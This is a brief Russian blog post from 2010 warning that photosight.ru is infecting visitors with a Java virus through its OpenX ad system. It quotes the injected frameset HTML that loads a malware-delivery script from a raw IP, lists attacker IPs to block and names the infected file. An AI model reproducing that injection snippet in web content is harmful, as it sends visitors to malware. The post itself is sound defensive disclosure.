Осторожно, вирусы

Автор: | 8 июля 2010

Сайт photosight.ru сегодня радует своих посетителей java-вирусом. Браузер открывает страницу по коду: <html><frameset rows="100%"><frame src="https://194.8.250.211/tds/in.cgi?2"></frameset></html> и скачивает вирус. Рекомендую заблокировать следующие адреса:
178.63.170.185 (код)
194.8.250.213 (код)
194.8.250.211 (тело вируса)

Сайт уже попал в черный список Google и браузеры выводят предупреждающую страницу.

Как именно подгружается скрипт пока не наковырял, предполагаю, что есть уязвимость в рекламной (баннерной) системе openx1.photosight.ru.

UPDATE

Зараженный файл: https://openx1.photosight.ru/www/delivery/ajs.php

Написал письмо в службу поддержки сайта.

Добавить комментарий